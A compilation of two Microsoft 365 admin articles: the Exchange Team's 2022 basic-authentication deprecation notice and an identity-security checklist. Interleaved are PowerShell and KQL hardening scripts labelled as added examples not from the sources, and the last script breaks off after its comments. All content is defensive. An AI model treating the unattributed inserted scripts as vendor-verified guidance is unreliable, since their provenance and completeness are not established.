When we turn off basic auth after October 1st, all customers will be able to use the self-service diagnostic to re-enable basic auth for any protocols they need, once per protocol. Details on this process are below.

Once this diagnostic is run, basic auth will be re-enabled for those protocol(s). Selected protocol(s) will stay enabled for basic auth use until end of December 2022. During the first week of calendar year 2023, those protocols will be disabled for basic auth use permanently, and there will be no possibility of using basic auth after that.

Avoiding Disruption

If you already know you need more time and wish to avoid the disruption of having basic auth disabled, you can run the diagnostic during the month of September; when October comes, we will not disable basic auth for the protocol(s) you specify. We will disable basic auth for any protocols you did not opt out of, but you will be able to re-enable them (until the end of the year) by following the steps below if you later decide you need those too.

In other words – if you do not want basic for a specific protocol or protocols disabled in October, you can use the same self-service diagnostic in the month of September. Details on this process below.

Diagnostic Options

Thousands of customers have already used the self-service diagnostic we discussed in earlier blog posts (here and here) to re-enable basic auth for a protocol that had been turned off, or to tell us not to include them in our proactive protection expansion program. We’re using this same diagnostic again, but the workflow is changing a little.

Today, we have archived all prior re-enable and opt-out requests. If you have previously opted out or re-enabled basic for some protocol, you’ll need to follow the steps below during the month of September to indicate you want us to leave something enabled for basic auth after Oct 1.

To invoke the self-service diagnostic, you can go directly to the basic auth self-help diagnostic by simply clicking on this button (it’ll bring up the diagnostic in the Microsoft 365 admin center if you’re a tenant Global Admin):


Or you can open the Microsoft 365 admin center and click the green Help & support button in the lower right-hand corner of the screen.


When you click the button, you enter our self-help system. Here you can enter the phrase “Diag: Enable Basic Auth in EXO”.

Customers with tenants in the Government Community Cloud (GCC) are unable to use the self-service diagnostic covered here. Those tenants may opt out by following the process contained in the Message Center post sent to their tenant today. If GCC customers need to re-enable a protocol following the Oct 1st deadline they will need to open a support ticket.

Opting Out

During the month of September 2022, the diagnostic will offer only the option to opt-out. By submitting your opt-out request during September, you are telling us that you do not want us to disable basic for a protocol or protocols during October.  Please understand we will be disabling basic auth for all tenants permanently in January 2023, regardless of their opt-out status.

The diagnostic will show a version of the dialog below, and you can re-run it for multiple protocols. It might look a bit different if some protocols have already been disabled. Note too that protocols are not removed from the list as you opt-out but rest assured (unless you receive an error) we will receive the request.


Re-Enabling Basic for protocols

Starting October 1, the diagnostic will only allow you to re-enable basic auth for a protocol for which it has been disabled.

If you did not opt-out during September, and we disabled basic for a protocol you later realize you need, you can use this to re-enable it.


Within an hour (usually much sooner) after you run the diagnostics and ask us to re-enable basic for a protocol, basic auth will start to work again.

At this point, we have to remind you that by re-enabling basic for a protocol, you are leaving your users and data vulnerable to security risks, and that we have customers suffering from basic auth-based attacks every single day (but you know that already).

Starting January 1, 2023, the self-serve diagnostic will no longer be available, and basic auth will soon thereafter be disabled for all protocols.

Summary of timelines and actions

Please see the following flow chart to help illustrate the changes and actions that you might need to take:

[Flow chart: summary of timelines and actions]

Blocking Basic Authentication Yourself

If you re-enable basic for a protocol because you need some extra time and then afterward no longer need basic auth you can block it yourself instead of waiting for us to do it in January 2023. The quickest and most effective way to do this is to use Authentication Policies which block basic auth connections at the first point of contact to Exchange Online.

Just go into the Microsoft 365 admin center, navigate to Settings – Org Settings – Modern Authentication and uncheck the boxes to block basic auth for all protocols you no longer need (these checkboxes will do nothing once we block basic auth for a protocol permanently, and we’ll remove them some time after January 2023).
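The admin center checkboxes above set an Exchange Online authentication policy behind the scenes. The following is an added example, not code from the Exchange Team post, of doing the same thing directly in Exchange Online PowerShell, where the result is explicit and can be put under change control. It assumes the ExchangeOnlineManagement module is installed and that you hold the Exchange Administrator or Global Administrator role; the policy names and the scanner mailbox address are placeholders. Note that, unlike Microsoft's own October change, this policy also blocks SMTP AUTH; drop that switch (or use the per-account exception shown) if you still have devices relaying mail that way.

```powershell
# Added example (not from the Exchange Team post): block Basic Authentication
# tenant-wide with an Exchange Online authentication policy, keep one narrow
# exception, and verify. Placeholders: policy names, scanner@contoso.example.

Import-Module ExchangeOnlineManagement
Connect-ExchangeOnline

$policyName = 'Block Basic Auth'   # placeholder name

# 1. A new authentication policy has every AllowBasicAuth* switch off already;
#    the explicit switches make the intent obvious to whoever reads the change.
New-AuthenticationPolicy -Name $policyName `
    -AllowBasicAuthActiveSync:$false `
    -AllowBasicAuthAutodiscover:$false `
    -AllowBasicAuthImap:$false `
    -AllowBasicAuthMapi:$false `
    -AllowBasicAuthOfflineAddressBook:$false `
    -AllowBasicAuthOutlookService:$false `
    -AllowBasicAuthPop:$false `
    -AllowBasicAuthPowershell:$false `
    -AllowBasicAuthReportingWebServices:$false `
    -AllowBasicAuthRpc:$false `
    -AllowBasicAuthSmtp:$false `
    -AllowBasicAuthWebServices:$false

# 2. Make it the tenant default so it applies to every account that has no
#    policy assigned explicitly. Existing sessions are re-evaluated, not killed
#    instantly, so allow up to a day before declaring basic auth gone.
Set-OrganizationConfig -DefaultAuthenticationPolicy $policyName

# 3. A single printer/scanner account that still relays via SMTP AUTH gets its own
#    policy that allows SMTP only, instead of weakening the tenant default.
New-AuthenticationPolicy -Name 'Allow SMTP AUTH only' -AllowBasicAuthSmtp:$true
Set-User -Identity 'scanner@contoso.example' -AuthenticationPolicy 'Allow SMTP AUTH only'

# 4. Verify: the default policy, then every user carrying an explicit exception.
(Get-OrganizationConfig).DefaultAuthenticationPolicy
Get-User -ResultSize Unlimited |
    Where-Object { $_.AuthenticationPolicy } |
    Select-Object UserPrincipalName, AuthenticationPolicy
```

The verification step is the part worth keeping as a recurring check: any account that shows up with an explicit policy is an exception someone has to own, and the list should only ever shrink.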


Reporting Web Service Endpoint

For those of you using the Reporting Web Service REST endpoint to get access to Message Tracking Logs and more, we’re also announcing today that this service will continue to have basic auth enabled until Dec 31st for all customers; no opt-out or re-enablement is required. And we’re pleased to be able to provide the long-awaited guidance for this too, right here.

EOP/SCC PowerShell

Basic authentication will remain enabled until Dec 31st, 2022. Customers need to migrate to certificate-based authentication. Follow the instructions here: App-only authentication.

One Other Basic Authentication Related Update

We’re adding a new capability to Microsoft 365 to help our customers avoid the risks posed by basic authentication. This new feature changes the default behavior of Office applications to block sign-in prompts using basic authentication. With this change, if users try to open Office files on servers that only use basic authentication, they won’t see any basic authentication sign-in prompts. Instead, they’ll see a message that the file has been blocked because it uses a sign-in method that may be insecure.

You can read more about this great new feature here: Basic authentication sign-in prompts are blocked by default in Microsoft 365 Apps.

Office Team is looking for customers to opt-in to their Private Preview Program for this feature. Please send them an email if you are interested in signing up: basicauthdeprmailer@microsoft.com.

Summary

This effort has taken three years from initial communication until now, and even that has not been enough time to ensure that all customers know about this change and take all necessary steps. IT and change can be hard, and the pandemic changed priorities for many of us, but everyone wants the same thing: better security for their users and data.

Our customers are important to us, and we do not want to see them breached, or disrupted. It’s a fine balance but we hope this final option will allow the remaining customers using Basic auth to finally get rid of it.

The end of 2022 will see us collectively reach that goal, to Improve Security – Together.

The Exchange Team

Source :
https://techcommunity.microsoft.com/t5/exchange-team-blog/basic-authentication-deprecation-in-exchange-online-september/ba-p/3609437

Use this Identity Checklist to secure your M365 tenant

Securing a Microsoft 365 tenant must start with identity.

Protecting identities is a fundamental part of Zero Trust and it’s the first “target” that most attackers look for. We used to say that attackers hack their way in, now we say they log in, using bought, found or stolen/phished credentials. This article will show you why MFA is so important and how to implement advanced security features in Azure AD such as PIM, Password protection, Conditional Access policies (also a strong part of Zero Trust), auditing and more.

Below is the first chapter from our free Microsoft 365 Security Checklist eBook. The Microsoft 365 Security Checklist shows you all the security settings and configurations you need to know for each M365 license to properly secure your environment. Download the full eBook and checklist spreadsheet.

Multi-Factor Authentication

It should be no surprise that we start with identity: it’s the new security perimeter, the new firewall, and a strong identity equals strong security. The first step to take here is implementing Multi Factor Authentication (MFA). It’s free for all Office / Microsoft tenants. If you want to use Conditional Access (CA) to enforce it (rather than just enabling users “in bulk”), you need Azure AD Premium P1+ licensing. A username and a simple password are no longer adequate (they never were; we just never had a simple, affordable, easy to use alternative) to protect your business.

Hand-in-hand with MFA you need user training. If your business is relying on users doing the right thing when they get the prompt on their phone – they MUST also know that if they get a prompt when they’re NOT logging in anywhere, they must click Block / No / Reject.

To enable MFA on a per-user basis, go to aad.portal.azure.com, login as an administrator, click Azure Active Directory – Security – MFA and click on the blue link “Additional cloud-based MFA settings”.

Additional MFA settings

There are two parts (tabs) on this page. On the service settings tab you should: disable app passwords (a workaround for legacy clients that don’t support MFA, which shouldn’t be necessary in 2022); leave the trusted public IP addresses list empty (it skips the MFA prompt for users in the corporate office, and both we and Microsoft recommend not using it); disable Call to phone and Text message to phone as verification options; and review the “remember MFA on trusted devices” setting (1-365 days), where Microsoft recommends either using CA policies to manage sign-in frequency or setting it to 90 days. Phone call and text message MFA are not strong authentication methods and should not be used unless there’s no other choice.

On the user’s tab you can enable MFA for individual users or click bulk update and upload a CSV file with user accounts.

If you have AAD Premium P1, it’s better to use a CA policy to enforce MFA, it’s more flexible and the MFA settings page will eventually be retired.

Enforcing MFA with a Conditional Access Policy

A few words of caution, enabling MFA for all your administrators is a given today. Seriously, if you aren’t requiring every privileged account to use MFA (or 2FA / passwordless, see below), stop reading and go and do that right now. Yes, it’s an extra step and yes, you’ll get push back but there’s just no excuse – it’s simply unprofessional and you don’t belong in IT if you’re not using it. For what it is worth, I’ve been using Azure MFA for over seven years and require it for administrators at my clients – no exceptions.

Enabling MFA for all users is also incredibly important but takes some planning. You may have some users who refuse to run the Microsoft Authenticator app on their personal phone – ask for it to be put in their hiring contract. You need to train them as to why MFA is being deployed, what to do, both for authentic logins and malicious ones. Furthermore, you need to have a smooth process for enrolling new users and offboarding people who are leaving.

You should also strongly consider creating separate (cloud only) accounts for administrators. They don’t require a license and it separates the day-to-day work of a person who only performs administrative actions in your tenant occasionally (or use PIM, Chapter 10).

MFA protects you against 99.9% of identity-based attacks but it’s not un-phishable. Stronger alternatives include biometrics such as Windows Hello for Business (WHFB) and 2FA hardware keys which bring you closer to the ultimate in identity security: passwordless.

Legacy Authentication

However, it’s not enough to enable MFA for all administrators and users; the bad guys can still get in with no MFA prompt in sight. The reason is that Office 365 still supports legacy protocols that don’t support modern authentication / MFA. You need to disable these, but you can’t just switch them off blindly: first check whether there are legitimate applications / workflows / scripts that use any of them. Go to aad.portal.azure.com, log in as a Global Administrator, click Azure Active Directory – Monitoring – Sign-in logs. Change the time range to the last month, click Add filters, then Client app, then None Selected; in the drop-down pick all 13 checkboxes under Legacy Authentication Clients and click Apply.

Filtering Azure AD Sign-in logs for legacy authentication

This will show you all the logins over the last month that used any of the legacy protocols. If you get a lot of results, add a filter for Status and select Success to filter out the password spraying and credential stuffing attempts that failed; a successful legacy sign-in is the one you must explain. Make sure you check the four different tabs: user sign-ins (interactive), user sign-ins (non-interactive), service principal sign-ins and managed identity sign-ins.
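The same investigation is easier to repeat, and to hand to the application owners, as a query. The block below is an added example, not the article's own code, that pulls the last 30 days of successful sign-ins from Azure AD through the Microsoft Graph PowerShell SDK, keeps only those made with a legacy client, and summarises them per user, client and application so each row is something to chase. It assumes the Microsoft.Graph module is installed and that the signed-in admin can consent to AuditLog.Read.All and Directory.Read.All. The client names are the strings Azure AD writes into the clientAppUsed field and match the portal's Legacy Authentication Clients filter group.

```powershell
# Added example (not from the article): list successful legacy-auth sign-ins
# over the last 30 days and summarise them per user / client / application.

Import-Module Microsoft.Graph.Reports
Connect-MgGraph -Scopes 'AuditLog.Read.All', 'Directory.Read.All'

# The 13 client types the portal groups under "Legacy Authentication Clients".
$legacyClients = @(
    'Authenticated SMTP', 'AutoDiscover', 'Exchange ActiveSync',
    'Exchange Online PowerShell', 'Exchange Web Services', 'IMAP4',
    'MAPI Over HTTP', 'Offline Address Book', 'Outlook Anywhere (RPC over HTTP)',
    'Outlook Service', 'POP3', 'Reporting Web Services', 'Other clients'
)

$since = (Get-Date).AddDays(-30).ToUniversalTime().ToString('yyyy-MM-ddTHH:mm:ssZ')

# errorCode 0 = success. Date and status are filtered server-side to keep the
# download small; the client filter runs locally (-in is case-insensitive).
$signIns = Get-MgAuditLogSignIn -All `
    -Filter "createdDateTime ge $since and status/errorCode eq 0" |
    Where-Object { $_.ClientAppUsed -in $legacyClients }

$summary = $signIns |
    Group-Object UserPrincipalName, ClientAppUsed, AppDisplayName |
    ForEach-Object {
        [pscustomobject]@{
            User      = $_.Group[0].UserPrincipalName
            Client    = $_.Group[0].ClientAppUsed
            App       = $_.Group[0].AppDisplayName
            SignIns   = $_.Count
            LastSeen  = ($_.Group.CreatedDateTime | Measure-Object -Maximum).Maximum
            SourceIPs = ($_.Group.IPAddress | Sort-Object -Unique) -join ', '
        }
    } |
    Sort-Object SignIns -Descending

$summary | Format-Table -AutoSize

# Hand each application owner only their rows.
$summary | Export-Csv -Path '.\legacy-auth-signins.csv' -NoTypeInformation
```

Two caveats: the v1.0 Graph endpoint returns interactive user sign-ins only, so the non-interactive, service principal and managed identity tabs the article mentions have to be queried separately (the beta endpoint exposes them through a signInEventTypes filter); and the SourceIPs column is there because a single legacy client hitting many mailboxes from one address is a much stronger signal than a mailbox count alone.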

You’ll now need to investigate the logins. In my experience there will be some users who are using Android / Apple mail on smartphones; point them to the free Outlook app instead (Apple mail can be configured to use modern authentication). There’s also likely to be line-of-business (LOB) applications and printers / scanners that send emails via Office 365, so you’ll need updates for these. Alternatively, you can use another email service for these such as smtp2go.

Once you have eliminated all legitimate legacy authentication protocol usage you can disable it in two ways, it’s best to use both. Start by creating a Conditional Access policy based on the new template to block it, also go to admin.microsoft.com, Settings – Org settings – Services – Modern authentication and turn off basic authentication protocols.

Disable legacy authentication protocols in the M365 Admin Center

Break Glass accounts

Create at least one, preferably two break glass accounts, also known as emergency access accounts. These accounts are exempted from MFA, all CA policies and PIM (see below) and have very long (40 characters+), complex passwords. They’re only used if AAD MFA is down, for example, to gain access to your tenant to temporarily disable MFA or a similar setting, depending on the outage.

A second part to this is that you want to be notified if these accounts are ever used. One way to do this is to send your Azure AD sign-in logs to Azure Monitor (also known as Log Analytics), with instructions here. Another option is to use Microsoft Sentinel (which is built on top of Log Analytics) and create an Analytics rule.
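For the alerting, the thing that matters is the query. As an added example (not from the article), here is the KQL you would put into a Sentinel scheduled analytics rule, wrapped in a PowerShell script that also runs it ad hoc against the Log Analytics workspace with the Az modules, which is a useful way to test the query before you create the rule. It assumes Az.Accounts and Az.OperationalInsights are installed, that the Azure AD sign-in logs (SigninLogs and AADNonInteractiveUserSignInLogs) are being exported to the workspace, and that the workspace ID and the break glass UPNs are placeholders for your own values.

```powershell
# Added example (not from the article): detect any sign-in attempt by a break
# glass account in the last hour, from the exported Azure AD sign-in logs.
# The $kql body is the query for a Sentinel scheduled rule (run every 5 minutes,
# look back 1 hour, trigger when results > 0).

Import-Module Az.Accounts, Az.OperationalInsights
Connect-AzAccount

$workspaceId = '00000000-0000-0000-0000-000000000000'   # placeholder
$breakGlass  = @('bg-admin-01@contoso.example', 'bg-admin-02@contoso.example')

# Build the dynamic() literal once so the same KQL serves the ad hoc run and the rule.
$upnList = ($breakGlass | ForEach-Object { "'$_'" }) -join ', '

# isfuzzy=true keeps the union valid even if one of the tables is not (yet) exported.
# Failed attempts are included on purpose: a burst of failures against these
# accounts is a password spray against your most privileged identities.
$kql = @"
let BreakGlass = dynamic([$upnList]);
union isfuzzy=true SigninLogs, AADNonInteractiveUserSignInLogs
| where TimeGenerated > ago(1h)
| where UserPrincipalName in~ (BreakGlass)
| project TimeGenerated, UserPrincipalName, ResultType, ResultDescription,
          IPAddress, Location, AppDisplayName, ClientAppUsed,
          ConditionalAccessStatus, Category
| order by TimeGenerated desc
"@

$result = Invoke-AzOperationalInsightsQuery -WorkspaceId $workspaceId -Query $kql
$rows   = @($result.Results)

if ($rows.Count -gt 0) {
    Write-Warning "Break glass account activity detected ($($rows.Count) events):"
    $rows | Format-Table -AutoSize
} else {
    Write-Host 'No break glass sign-ins in the last hour.'
}
```

Because these accounts are excluded from every CA policy, the ConditionalAccessStatus column should always read notApplied for them; anything else means the exclusion has been lost and the account may lock you out exactly when you need it.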

Microsoft Sentinel alert rule when a Break Glass account is used

Security Defaults

If yours is a very small business, with few requirements for flexibility, the easiest way to set up Azure AD with MFA for everyone, plus several other security features enabled, is to turn on Security Defaults. Note that you can’t have break-glass accounts or other service accounts with Security Defaults as there’s no way to configure exceptions. Go to Properties for your Azure AD tenant and scroll to the bottom, and click on Manage Security defaults, here you can enable and disable it.

Privileged Identity Management

It’s worth investing in Azure Active Directory (AAD) Premium P2 for your administrators’ accounts and enabling Privileged Identity Management (PIM). This means their accounts are ordinary user accounts that are eligible to elevate their privileges to whatever administrator role they are assigned (see Chapter 10).

If you’re not using PIM, create dedicated admin accounts in AAD only. Don’t sync these accounts from on-premises but enforce MFA and strong passwords. Since they won’t be used for day-to-day work, they won’t require an M365 license.

Password Protection

After MFA, your second most important step is banning bad passwords. You’re probably aware that we’ve trained users to come up with bad passwords over the last few decades with “standard” policies (at least 8 characters, uppercase, lowercase, special character and numbers), which result in P@ssw0rd1 and, when they’re forced to change it every 30 days, P@ssw0rd2. Both NIST in the US and GCHQ in the UK now recommend allowing (but not enforcing) the use of upper / lowercase etc., not mandating frequent password changes, and instead checking the password at the time of creation against a list of known, common bad passwords and blocking those. In Microsoft’s world that’s called Password protection, which is enabled for cloud accounts by default. There’s a global list of about 2000 passwords (and their variants) that Microsoft maintains, based on passwords they find in dumps, and you should add (up to 1000) company-specific words (brands, locations, C-suite people’s names, local sports teams, etc.) for your organization.

You find Password protection in the AAD portal – Security – Authentication Methods.

Password protection settings

Remember, you don’t have to add common passwords to the list, they’re already managed by Microsoft, just add company / region specific words that your staff are likely to use.

If you’re syncing accounts from Active Directory on-premises to AAD, you should also extend Password protection to your DCs. It involves the installation of an agent on each DC, a proxy agent, and a reboot of each DC.

Continuous Access Evaluation

This feature has been in preview for quite some time but is now in general availability. Before Continuous Access Evaluation (CAE), when you disabled a user’s account, or they changed location (from the office to a public Wi-Fi for example) it could be up to one hour before their state was re-evaluated and new policies applied, or they were blocked from accessing services. With CAE, this time is much shorter, in most cases in the order of a few minutes. It’s turned on by default for all tenants (unless you were part of the preview and intentionally disabled it). Another benefit of CAE is that tokens are now valid for 28 hours, letting people keep working during a shorter Azure AD outage. You can disable CAE in a CA policy, but it’s not recommended.

Conditional Access policies

We’ve mentioned Conditional Access (CA) policies several times already as it’s a crucial component of strong identity security and Zero Trust. Unlike other recommendations, there isn’t a one size fit all set of CA policies we can give you, however (at a minimum) you should have policies for:

  • Require MFA for admins (see MFA above)
  • Require MFA for users (see MFA above)
  • Require MFA for Azure management
  • Block legacy authentication (see Legacy Authentication above)
  • Require compliant or Hybrid AAD joined device for admins
  • Require compliant or Hybrid AAD joined device for users
  • Block access to M365 from outside your country
  • Require MFA for risky sign-ins (if you have AAD Premium P2)
  • Require password change for high-risk users (if you have AAD Premium P2)

This is all going to be a lot easier going forward with the new policy templates for identity and devices. Go to Azure AD – Security – Conditional Access – New policy – Create a new policy from templates. Another step to take is to create a system for managing the lifecycle of policies and there’s an API for backing up and updating policies, that you can access in several ways, including PowerShell. There’s even a tutorial to set up a backup system using a Logic App.

Conditional Access policy templates for identity

A common question is if there’s a priority when policies are evaluated and there isn’t, they’re all processed together for a particular sign-in, from a specific device and location to an individual application. If there are multiple policies with different controls (MFA + compliant device), all controls must be fulfilled for access. And if there are conflicting policies with different access (block vs grant), block access will win.

To get you started, here are the step-by-step instructions for a policy blocking access to M365 from outside your country, appropriate for most small and medium businesses that only operate in one or a few countries. Keep in mind that travelling staff may be caught out by this so make sure you align with business objectives and be aware that this won’t stop every attack as a VPN or TOR exit node can make it appear as if the attacker is in your country, but it’s one extra step they must take. Remember, you don’t have to run faster than the Fancy Bear, just faster than other companies around you.

Start by going to Azure AD – Security – Conditional Access – Named locations, click +Countries location and call the location Blocked countries. Leave Determine location by IP address selected; the newer option of using the GPS location from the Microsoft Authenticator app will be more accurate once all your users are using Azure AD MFA (and can therefore be located via GPS). Tick the box next to Name to select all countries, then clear the checkbox for the one(s) you need to allow logins from, and click Create.

Creating a Named Location for a Conditional Access Policy

Go to Azure AD – Security – Conditional Access – New policy – Create new policy and name your policy with a name that clearly defines what the policy does and adheres to your naming standard. Click on All Users… and Include All users and Exclude your Break Glass accounts.

Click on No cloud apps… and select All cloud apps. Select 0 conditions… and click Not configured under Locations. Pick Selected locations under Include and select your newly created location. Finally, under Access controls – Grant, click 0 controls selected and then Block access.

CA policies can be either in Report-only mode where you can look at reports of what they would have blocked and control they would have enforced, or they can be turned on / off. Report-only can be handy to make sure you don’t get fired for accidentally locking everyone out but turn this policy on as soon as possible.
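The same policy built with the Microsoft Graph PowerShell SDK, as an added example that is not part of the article. It goes one step further than the portal walkthrough: instead of enumerating every blocked country, it defines the countries you operate from as a named location and applies the block to All locations except that one. The effect is the same, it is far shorter to review, and because unknown regions are not included in the allowed location, an IP that cannot be geolocated is blocked too. It assumes the Microsoft.Graph module is installed, an admin who can consent to Policy.ReadWrite.ConditionalAccess and User.Read.All, and that the country codes and break glass UPNs are placeholders for your own. The policy is created in report-only mode, as the paragraph above advises.

```powershell
# Added example (not from the article): geo-block Conditional Access policy via
# Microsoft Graph PowerShell. Placeholders: country codes, break glass UPNs, names.

Import-Module Microsoft.Graph.Identity.SignIns, Microsoft.Graph.Users
Connect-MgGraph -Scopes 'Policy.ReadWrite.ConditionalAccess', 'User.Read.All'

$allowedCountries = @('AU', 'NZ')   # ISO 3166-1 alpha-2 codes; placeholders
$breakGlassUpns   = @('bg-admin-01@contoso.example', 'bg-admin-02@contoso.example')

# 1. Named location holding the countries you operate from. Unknown regions are
#    deliberately left out, so an IP that cannot be geolocated falls into the block.
$location = New-MgIdentityConditionalAccessNamedLocation -BodyParameter @{
    '@odata.type'                     = '#microsoft.graph.countryNamedLocation'
    displayName                       = 'Allowed countries'
    countriesAndRegions               = $allowedCountries
    includeUnknownCountriesAndRegions = $false
}

# 2. CA policies exclude users by object ID, so resolve the break glass UPNs.
$breakGlassIds = foreach ($upn in $breakGlassUpns) {
    (Get-MgUser -UserId $upn -Property Id).Id
}

# 3. Block all users, for all cloud apps, from every location except the allowed
#    one. Report-only first; set state to 'enabled' once the report looks clean.
$policy = New-MgIdentityConditionalAccessPolicy -BodyParameter @{
    displayName = 'CA-Block-Sign-in-Outside-Allowed-Countries'
    state       = 'enabledForReportingButNotEnforced'
    conditions  = @{
        users        = @{ includeUsers = @('All'); excludeUsers = $breakGlassIds }
        applications = @{ includeApplications = @('All') }
        locations    = @{
            includeLocations = @('All')
            excludeLocations = @($location.Id)
        }
    }
    grantControls = @{ operator = 'OR'; builtInControls = @('block') }
}

"Created policy '$($policy.DisplayName)' ($($policy.Id)) in state $($policy.State)"
```

The block legacy authentication policy from the Legacy Authentication section has exactly the same shape: drop the locations condition and add a client app condition of exchangeActiveSync and other under conditions (the clientAppTypes values Conditional Access uses for legacy clients), keeping the block control and the break glass exclusion.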

Conditional Access policy to block logins from outside Australia

A common question is, how can I control how often users are prompted for MFA or to sign in again? While it might be counterintuitive, the default in Azure AD is a rolling window of 90 days. Remember, if you change a user’s password, block non-compliant devices, or disable an account (plus any number of other CA policies you have in place that might affect the security posture of the session), it’ll automatically require new authentication. Don’t prompt users for authentication when nothing has changed, because if you do it too frequently, they’re more likely to approve a malicious login.

Branding Log-on Pages

While in the Azure AD portal, click on Company branding and add a company-specific Sign-in page background image (1920x1080px) and a Banner logo (280x60px). Note that these files have to be small (300 KB and 10 KB respectively) so you may have to do some fancy compression. This isn’t just a way to make users feel at home when they see a login page, in most cases when attackers send phishing emails to harvest credentials, they’ll send users to a fake login page that looks like the generic Office 365 one, not your custom one which is another clue that should alert your users to the danger. Also – Windows Autopilot doesn’t work unless you have customized AAD branding.

Edit Azure AD Company Branding images

Self Service Password Reset

The benefit of Self Service Password Reset (SSPR) is to lower the load on your help desk to manage password resets for users. Once enabled, users must register various ways of being identified when they’re resetting their password, mobile app notification/code, email (non-Office 365), mobile/office phone call, security questions (not available to administrators, plus you can create custom questions). If you are synchronizing user accounts from AD to Azure AD, take care in setting up SSPR as the passwords must be written back to AD from the cloud once changed.

Configuring Self Service Password Reset in Azure AD

Unified Auditing

Not restricted to security but nevertheless, a fundamental building block is auditing across Microsoft 365. Go to the Microsoft 365 Defender portal and find Audit in the left-hand menu (it’s almost at the end). If for some reason unified auditing isn’t enabled in your tenant a yellow banner will give you a button to turn it on (it’s on by default for new tenants). Once enabled, click the Audit retention policies tab, and create a policy for your tenant. You want to ensure that you have logs to investigate if there’s a breach and you want them kept for as long as possible.

With Business Premium you get a maximum of 90 days of retention and Microsoft 365 E5 gives you one year, but you want to make sure to create a policy to set this, rather than rely on the default policy (which you can’t see). Give the policy a name, a description and add all the record types, one by one. This policy will now apply to all users (including new ones that are created) for all activities. Only use the Users option when you want to have a specific policy for a particular user. Give the policy a priority, 1 is the highest and 10,000 is the lowest.
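Clicking through every record type in the portal is tedious and easy to get wrong, and a policy created from a script is also one you can re-apply after a tenant migration. The following is an added example, not the article's own code, that checks unified audit log ingestion and creates the tenant-wide retention policy from Exchange Online and Security & Compliance PowerShell. It assumes the ExchangeOnlineManagement module is installed, that the admin holds a role with audit log management rights (Organization Management), and that TwelveMonths is what your licence permits (the article's E5 case; Business Premium stops at ThreeMonths). The policy name and the record type list are placeholders to adapt.

```powershell
# Added example (not from the article): enforce unified audit logging and create
# a tenant-wide audit retention policy at maximum duration. Placeholders: policy
# name/description, record type list, retention duration per your licence.

Import-Module ExchangeOnlineManagement
Connect-ExchangeOnline      # Exchange Online cmdlets (audit ingestion switch)
Connect-IPPSSession         # Security & Compliance cmdlets (retention policies)

# 1. Ingestion is on by default for new tenants; enforce it rather than assume it.
if (-not (Get-AdminAuditLogConfig).UnifiedAuditLogIngestionEnabled) {
    Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $true
}

# 2. Record types to retain. The article's advice is to add all of them; this
#    list names the identity, mail and file types an incident responder reaches
#    for first, so extend it with the rest from the portal's record type list.
$recordTypes = @(
    'AzureActiveDirectory', 'AzureActiveDirectoryAccountLogon', 'AzureActiveDirectoryStsLogon',
    'ExchangeAdmin', 'ExchangeItem', 'ExchangeItemGroup', 'ExchangeAggregatedOperation',
    'SharePoint', 'SharePointFileOperation', 'SharePointSharingOperation', 'OneDrive',
    'MicrosoftTeams', 'SecurityComplianceCenterEOPCmdlet', 'ThreatIntelligence'
)

# 3. One tenant-wide policy. No -UserIds, so it covers every user, including ones
#    created later. Priority 1 is the highest; any per-user policy sits below it.
$policyName = 'Audit - retain all activity 12 months'
if (-not (Get-UnifiedAuditLogRetentionPolicy -Identity $policyName -ErrorAction SilentlyContinue)) {
    New-UnifiedAuditLogRetentionPolicy -Name $policyName `
        -Description 'Tenant-wide maximum audit retention' `
        -RecordTypes $recordTypes `
        -RetentionDuration TwelveMonths `
        -Priority 1
}

# 4. Verify what is actually in effect (the default policy is not listed here).
Get-UnifiedAuditLogRetentionPolicy |
    Format-Table Name, Priority, RetentionDuration, RecordTypes -AutoSize
```

Keep the verification output with your evidence for the checklist: the retention policy is what decides whether a sign-in from six months ago is still there to investigate, and it is not visible anywhere else.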

Create an audit retention policy for maximum retention

Integrating applications into Azure AD

One of the most powerful but often overlooked features (at least in SMBs) is the ability to use Azure AD to publish applications to your users. Users can go to myapps.microsoft.com (or office.com) and see tiles for all applications they have access to. But there’s more to that story. Say, for example, you have a shared, corporate Twitter account that a few executives and marketing staff should have access to. Instead of sharing a password amongst them all and having to remember to reset it if someone leaves the organization, you can create a security group in AAD, add the relevant users, link Twitter to the group and they’ll automatically have access – without knowing the password to the account. There are a lot more actions you can take here to simplify access and secure management of applications, here’s more information.

Azure AD Connect

If you’re synchronizing accounts from Active Directory to Azure Active Directory (AAD), check the configuration of AAD Connect and make sure you’re not replicating an entire domain or forest to AAD. There’s no reason that service accounts and similar objects should be exposed in both directories, so start the AAD Connect wizard on the server where it’s installed and double-check that only relevant OUs are synchronized. One other thing to note here is that any machine running Azure AD Connect should be treated with the same care (in terms of security) as a domain controller. This is because AAD Connect requires the same level of access as AD itself and has the ability to read password hashes. Making sure security best practices for access, patching, etc. are followed to the letter for the system running AAD Connect is critically important.

The M365 Identity Checklist

Work through the Identity checklist.
 
Enable MFA for administrators
Enable MFA for users
Create cloud-only administrator accounts for privileged users / occasional administrators
Disable app passwords
(Configure trusted IPs)
Disable text message MFA
Disable phone call MFA
Remember MFA trusted devices 90 days
Train staff in using MFA correctly
Use Windows Hello where possible
Use FIDO2 / 2FA keys where possible
Investigate legacy authentication protocol usage in AAD Sign-in logs
Block legacy authentication with CA Policy
Block legacy authentication in M365 Admin Center
Create two Break glass accounts and exempt from MFA, CA Policies etc.
Configure alerting if a Break glass account is used
Enable Security Defaults in AAD (consider the limitations)
Enable PIM (AAD Premium P2) for all admin users
Add organization-specific words to Password protection
Deploy Password protection in AD on-premises
CA Policy Require MFA for admins
CA Policy Require MFA for users
CA Policy Require MFA for Azure management
CA Policy Block legacy authentication
CA Policy Require compliant or Hybrid AAD joined device for admins
CA Policy Require compliant or Hybrid AAD joined device for users
CA Policy Block access to M365 from outside your country
Require MFA for risky sign-ins (Only for E5)
Require password change for high-risk users (Only for E5)
Create custom branding logos and text in Azure AD
Enable and configure Self Service Password Reset, including password writeback
Check that Unified Auditing is enabled
Define audit retention policies (90 or 365 days)
Integrate applications into Azure AD
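Two of the checklist items above, investigating legacy authentication in the sign-in logs and watching for break glass account use, can be checked from the same sign-in data. The script below is an added example, not code from the article; it uses the Microsoft Graph PowerShell SDK (Microsoft.Graph.Reports module). The break glass UPNs, the seven-day window and the list of client app names treated as modern authentication are assumptions.

```powershell
# Added example (not from the article): review Azure AD sign-in logs for
# legacy-authentication usage and for any sign-in by the break glass accounts.
# Requires Microsoft.Graph.Reports and AuditLog.Read.All consent. The UPNs,
# window and client-app classification below are assumptions.
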